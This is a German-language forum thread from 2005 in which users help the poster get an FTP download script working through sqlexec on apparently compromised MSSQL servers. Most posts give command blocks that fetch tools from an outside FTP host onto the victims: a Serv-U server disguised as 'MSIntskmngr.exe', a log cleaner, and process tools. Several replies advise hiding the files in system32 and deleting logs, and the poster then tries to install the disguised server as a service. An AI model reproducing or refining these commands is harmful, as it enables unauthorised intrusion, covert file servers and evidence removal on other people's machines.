Probl mit Sqlexec beim Ausführen d. Script

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von and1theReal, 31. August 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 31. August 2005
    Hallo,

    hab meine Dateien (serv-u.ini...) vorher alle auf einen Pub geladen. Dann hab ich mir das Scribt geschrieben:

    echo open 81.***.**.***>>c:\ftpscr.txt
    echo user anonymous anonymous@lol.com>>c:\ftpscr.txt
    echo BINARY>>c:\ftpscr.txt
    echo get MSIntskmngr.exe>>c:\ftpscr.txt
    echo get mspaintfixd.tmp>>c:\ftpscr.txt
    echo get clearlogs.exe>>c:\ftpscr.txt
    echo get kill.exe>>c:\ftpscr.txt
    echo get Fport.exe>>c:\ftpscr.txt
    echo quit>>c:\ftpscr.txt


    Dann hab ich das Scribt mit dem Befehl


    ftp -n -v -s:c:\ftpscr.txt

    gestartet.

    Und dann erhalte ich folgende Fehler:



    Connected to 81.***.**.***.

    open 81.***.**.***
    220 Microsoft FTP Service
    Already connected to 81.***.**.***, use disconnect first.

    Already connected to 81.***.**.***, use disconnect first.

    Already connected to 81.***.**.***, use disconnect first.

    Invalid command.

    Invalid command.

    open 81.***.**.***
    open 81.***.**.***
    open 81.***.**.***
    anonymous
    anonymous@lol.com
    BINARY
    530 Please login with USER and PASS.

    get MSIntskmngr.exe
    530 Please login with USER and PASS.

    530 Please login with USER and PASS.

    221



    Kann mir einer sagen, was daran falsch ist ? Danke
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 31. August 2005
    echo open 81.***.**.*** port>>c:\ftpscr.txt
    echo type BINARY>>c:\ftpscr.txt

    Lass es lieber, such dir ne andere beschäftigung ;(
     
  4. #3 31. August 2005
    ...im tutorial steht, dass man bei pubs keinen port angeben brauch, sonder nur bei einem stro...

    Ich wette du konntest es auch nicht gleich von Anfang ohne Fehler...

    Und für was ist das Board da...

    Naja, durch schnelle Hilfe von einem freundlichen User probier ich es mal mit Webspace...
     
  5. #4 31. August 2005
    ja genau da ist dein problem....
    Im Tutorial steht........ im tutorial steht.......

    Warum findest du es nicht selber heraus?

    530 Please login with USER and PASS <- username/password falsch
     
  6. #5 31. August 2005
    So muss es rcihtig heißen ;)

    Code:
    echo open 81.***.**.*** >> c:\ftpscr.txt
    echo user anonymous ftp@ftp.com >> c:\ftpscr.txt
    echo binary >> c:\ftpscr.txt
    echo get MSIntskmngr.exe >> c:\ftpscr.txt
    echo get mspaintfixd.tmp >> c:\ftpscr.txt
    echo get clearlogs.exe >> c:\ftpscr.txt
    echo get kill.exe >> c:\ftpscr.txt
    echo get Fport.exe >> c:\ftpscr.txt
    echo quit >> c:\ftpscr.txt
    ftp -n -v -s:c:\ftpscr.txt
     
  7. #6 31. August 2005
    sachmal jetzt sagt Fre@k schon, dass der port fehlt, und ihr machts immer noch falsch

    und wer kann so dumm sein und macht dit txt in c:\ rein macht doch wenigstens in c:\windows\system32
     
  8. #7 31. August 2005
    Den port kannst bei pubs weglassen....

    Brauchst nur bei stros hinschreiben..

    Die txt kannst danach sowieso löschen.

    del c:\ftpscr.txt (in dem falle)

    Also ist es eigentlich egal ob du die ins root verzeichniss packst.
     
  9. #8 31. August 2005
    habs jetzt mal mit nem webspace bei arcor probiert....


    echo open home.arcor.de 21>>c:\ftpscr.txt
    echo user [name] [passwort]>>c:\ftpscr.txt
    echo BINARY>>c:\ftpscr.txt
    echo get MSIntskmngr.exe>>c:\ftpscr.txt
    echo get mspaintfixd.tmp>>c:\ftpscr.txt
    echo get clearlogs.exe>>c:\ftpscr.txt
    echo get kill.exe>>c:\ftpscr.txt
    echo get Fport.exe>>c:\ftpscr.txt
    echo quit>>c:\ftpscr.txt


    wenn ich es nun mit dem befehl

    ftp -n -v -s:c:\ftpscr.txt

    starte, kommt: Error opening script file c:\ftpscr.txt.

    Was ist nun falsch ?

    Liegt es am Webspace (habs auch schon mit tripod geteste) ?
    Die Datei ftpscr.txt muss schon auf meinem Rechner direkt auf c:\ liegen ?
     
  10. #9 1. September 2005
    Könnte mir vielleicht nochmal jemand helfen ? Ich bekomms nicht hin...ich test schon 24 stunden am stück und bekomm es nicht hin.
     
  11. #10 1. September 2005
    gimme mal die ip von dem teil per pn
     
  12. #11 1. September 2005
    musste so machen

    echo open home.arcor.de >>c:\ftpscr.txt
    echo [name] >>c:\ftpscr.txt
    echo [passwort] >>c:\ftpscr.txt
    echo type BINARY >>c:\ftpscr.txt
    echo get MSIntskmngr.exe c:\MSIntskmngr.exe >>c:\ftpscr.txt
    echo get mspaintfixd.tmp c:\mspaintfixd.tmp >>c:\ftpscr.txt
    echo get clearlogs.exe c:\clearlogs.exe >>c:\ftpscr.txt
    echo get kill.exe c:\kill.exe >>c:\ftpscr.txt
    echo get Fport.exe c:\Fport.exe >>c:\ftpscr.txt
    echo quit >>c:\ftpscr.txt
    und dan ftp -s:c:\ftpscr.txt
     
  13. #12 1. September 2005
    damn ich hab gehofft nen fehler zu finden aber vergebens ;)

    würde vlt. ehr noch so machen:
    echo open home.arcor.de >>c:\ftpscr.txt
    echo [name] >>c:\ftpscr.txt
    echo [passwort] >>c:\ftpscr.txt
    echo type BINARY >>c:\ftpscr.txt
    echo get MSIntskmngr.exe c:\$windir$\system32\MSIntskmngr.exe >>c:\ftpscr.txt
    echo get mspaintfixd.tmp c:\$windir$\system32\mspaintfixd.tmp >>c:\ftpscr.txt
    echo get clearlogs.exe c:\$windir$\system32\clearlogs.exe >>c:\ftpscr.txt
    echo get kill.exe c:\$windir$\system32\kill.exe >>c:\ftpscr.txt
    echo get Fport.exe c:\$windir$\system32\Fport.exe >>c:\ftpscr.txt
    echo quit >>c:\ftpscr.txt
     
  14. #13 1. September 2005
    hey ich denkste ich kann das nicht? man traust du mir viel zu. den ordner kann man ja beliebing wählen oder später die daten mit move verschieben
     
  15. #14 2. September 2005
    he danke dass ich mir noch helft...ich werd eure tipps mal ausprobieren und mich wieder melden...
     
  16. #15 2. September 2005
    schau erstmal ob die ftp.exe überhaupt vorhanden ist
    denn die scripts sind i.o.
    versuchs lieber mitn pub als vom webspace.
     
  17. #16 2. September 2005

    Looooool
    Das %windir% ist "C:\Windows", da brauchste kein "c:\" mehr vornehinstellen
     
  18. #17 2. September 2005
    So wie ich das sehe,hat das bis jetzt anscheinend noch keiner so gemacht,wie ich das machen würde und zwar so:
    echo open IP > C:\winnt(o.Windows)\system32\ftp.txt
    echo user anonymous anonymous@mail.com >> C:\winnt(o.Windows)\system32\ftp.txt
    echo BINARY >> C:\winnt(o.Windows)\system32\ftp.txt
    echo lcd C:\winnt(o.Windows)\system32 >> C:\winnt(o.Windows)\system32\ftp.txt
    echo get servu.exe(o. anderer Dateiname) >> C:\winnt(o.Windows)\system32\ftp.txt
    echo get servu.ini(o. anderer Dateiname) >> C:\winnt(o.Windows)\system32\ftp.txt
    echot quit >> C:\winnt(o.Windows)\system32\ftp.txt

    Wichtig ist,das beim open nur ein ">" Zeichen zur ableitung und bei den anderen zwei ">>" benutzt werden!Ausserdem muss man vor dem ">" und danach immer ein Leerzeichen machen!
    Das "lcd" dient dazu,das verzeichnis zu wechseln,sodass er die files ohne probleme in den "system32" Ordner verfrachtet!Aber an deiner stelle würde ich mir erst mal dos und mssql richtig reinziehen,sonst hast du leider keine chance irgendwie deine "stros" zu securen o. irgendwelche andere Sicherheiten(logs deleten ) usw anzustellen!


    MfG Phraser

    Ps.:Bei fragen einfach ne PN
    Ps.2:Finde ich es von euch (die ersten posts) ziemlich beschissen,einfach nur zu posten und zu sagen,dass ers lassen soll!Entweder ihr helft ihm,oder lasst es sein!
     
  19. #18 2. September 2005
    das war so gemeint, dass er erstmal prüfen soll, welches os auf dem str0 und und dann $windir$ durch das verzeichniss ersetzt
     
  20. #19 2. September 2005
    hm um ehrlich zu sein,hab ich doch dagegen nix gesagt,is aber trotzdem besser,einmal mit lcd die dir zu changen und das dann vorm datei laden wegzulassen!
     
  21. #20 2. September 2005
    ...Das nen ich Unterstützung...TOP...

    Bevor ich weiter teste noch kurz eine Frage...ich sitze hinter einem Router...macht das was bzw muss ich Ports freischalten ?

    chimera03: wo muss die ftp.exe vorhanden sein ?


    mhhh...

    ich hab jetzt mal probiert:

    echo open home.arcor.de >>c:\ftpscr.txt
    echo "name" >>c:\ftpscr.txt
    echo "passwort" >>c:\ftpscr.txt
    echo type BINARY >>c:\ftpscr.txt
    echo get MSIntskmngr.exe c:\MSIntskmngr.exe >>c:\ftpscr.txt
    echo get mspaintfixd.tmp c:\mspaintfixd.tmp >>c:\ftpscr.txt
    echo get clearlogs.exe c:\clearlogs.exe >>c:\ftpscr.txt
    echo get kill.exe c:\kill.exe >>c:\ftpscr.txt
    echo get Fport.exe c:\Fport.exe >>c:\ftpscr.txt
    echo quit >>c:\ftpscr.txt



    echo open 81.***.**.*** > C:\windows\system32\ftp.txt
    echo user anonymous anonymous@mail.com >> C:\windows\system32\ftp.txt
    echo BINARY >> C:\windows\system32\ftp.txt
    echo lcd C:\windows\system32 >> C:\windows\system32\ftp.txt
    echo get MSIntskmngr.exe >> C:\windows\system32\ftp.txt
    echo get mspaintfixd.tmp >> C:\windows\system32\ftp.txt
    echo quit >> C:\windows\system32\ftp.txt


    funktioniert auch nicht..kommt sofort der fehler: Error opening script file c:\.....txt.


    So langsam glaube ich an einen andere Fehler, aber ka was...

    Wo ich es das erstemal ausprobiert habe, kam ja auch noch der Fehler, pls login with USER and PASS....

    Aber das kommt jetzt auch nicht mehr...
     
  22. #21 2. September 2005
    router macht nichts bei dir @home
    ftp.exe ist in system32
     
  23. #22 2. September 2005
    du musst dann natürlich auch dein ftp script verändern :
    ftp.exe -s usw. :C:\windows\system32\ftp.txt

    Mit dem usw meine ich parameter,die dabei stehen(weiss sie jetzt nicht auswendig,sry)
     
  24. #23 2. September 2005
    dann müsste es aber bei dem ersten gehn...habs aber acuh nochmal so gemacht wie du gesagt hast phraser, ging nicht...

    Könnte es sein dass es am mssql Server leigt ? Hab hier grad nur 3 zum testen...

    Ich glaube nämlich nicht dass es am Script selber liegt...

    Soll ich einem mal einen scan schicken ? zum testen ? oder hat mir einer einen, von dem er weis dass er geht...nur einen mit ein paar mb freiem platz
     
  25. #24 2. September 2005
    wen du willst teste ich mal schick mir einfach mal nen scan und ich schau was sich machen lässt
     
  26. #25 2. September 2005
    Hi ,


    nachdem mir MASTERJULIAN auf die Sprünge geholfen hat, bin ich nun weiter...

    Ich hab einfach nur die Textdatei starten wollen, ohne jede Befehl davor einzeln in sqlexec einzugeben :(


    So....mit dem Tripod Account hats geklappt !!!


    Dann hatte ich die Dateien auch auf dem Server...

    Nun wollte ich die MSIntskmngr.exe (Serv-u.exe) als Dienst starten :

    c:\Windows\system32\spool\drivers\w32x86\MSIntskmngr.exe /i

    starten, aber das Prog blieb über 10min "hängen".

    Da dachte ich mir, dass es nicht so lange dauern kann, einen Dienst zu starten und hab abgebrochen.

    dann nochmal connectet und wollt die datei nur mal so starten:

    NET Start MSIntskmngr.exe ....aber dann kam ein Fehler...

    Nun hab ich mal alle Dateien wieder von dem Server gelöscht...brauch erst mal ne pause :)
     

  27. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Probl Sqlexec Ausführen
  1. Antworten:
    6
    Aufrufe:
    6.409
  2. Antworten:
    11
    Aufrufe:
    588
  3. Antworten:
    14
    Aufrufe:
    896
  4. Antworten:
    13
    Aufrufe:
    550
  5. SqlExec Problem

    Romka , 15. Juni 2006 , im Forum: Sicherheit & Datenschutz
    Antworten:
    8
    Aufrufe:
    788